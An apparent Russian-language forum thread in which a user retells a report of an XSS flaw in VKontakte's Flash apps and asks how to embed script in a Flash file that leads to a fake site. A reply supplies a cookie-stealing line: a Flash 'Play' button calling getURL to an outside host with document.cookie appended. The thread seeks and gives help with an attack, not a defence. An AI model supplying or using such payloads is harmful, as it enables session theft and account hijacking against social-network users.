На многих форумах и сайтах я встричал ето : В популярной социальной сети ВКонтакте.ру, в сервисе Приложения обнаружена XSS-уязвимость. Она заключается в том, что в исходный код флэшки можно внедрить javascript, который при прямом доступе к флэшке исполнится, как и в IE, так и в Firefox'е. Это, конечно, разработчиками ВКонтакте учтено: прямой доступ к флэшке запрещен. Но флэшка сохраняется в кэше браузера, откуда ее можно загрузить без проблем. Когда флэшка сохранилась в кэше браузера, то она может открыть новое окно с ссылкой на себя, браузер ее загрузит из кэша - и javascript выполнится. Единственное, что спасает, - это блокировщик всплывающих окон. Но обычные пользователи, видя, что открывает его ВКонтакт, блокировку снимут. Работоспособность во всех браузерах не гарантирована, проверялось на IE6 и FF3RC1 Как ето здєлать ??? Помогите написать FLASH
Как можна взять льбую FLASH і впихнути в ее JAVA которий будєт потом виполнят скрипт і которий будєт входити на сайт фейк І подскажите што нада туда впихнути
В популярной социальной сети ВКонтакте.ру, в сервисе Приложения обнаружена XSS-уязвимость. Она заключается в том, что в исходный код флэшки можно внедрить javascript, который при прямом доступе к флэшке исполнится, как и в IE, так и в Firefox'е. Это, конечно, разработчиками ВКонтакте учтено: прямой доступ к флэшке запрещен. Но флэшка сохраняется в кэше браузера, откуда ее можно загрузить без проблем. Когда флэшка сохранилась в кэше браузера, то она может открыть новое окно с ссылкой на себя, браузер ее загрузит из кэша - и javascript выполнится. Единственное, что спасает, - это блокировщик всплывающих окон. Но обычные пользователи, видя, что открывает его ВКонтакт, блокировку снимут. Работоспособность во всех браузерах не гарантирована, проверялось на IE6 и FF3RC1 Пример атаки: http://vkontakte.ru/apps.php?act=s&id=15… (новое окно открывается через 2 секунды) Как ето здєлать ?????
сделай во флэше красивую кнопку Play, на ней замути что-то типа Code: getURL("http://rulix.h18.ru/?+document.cookie");
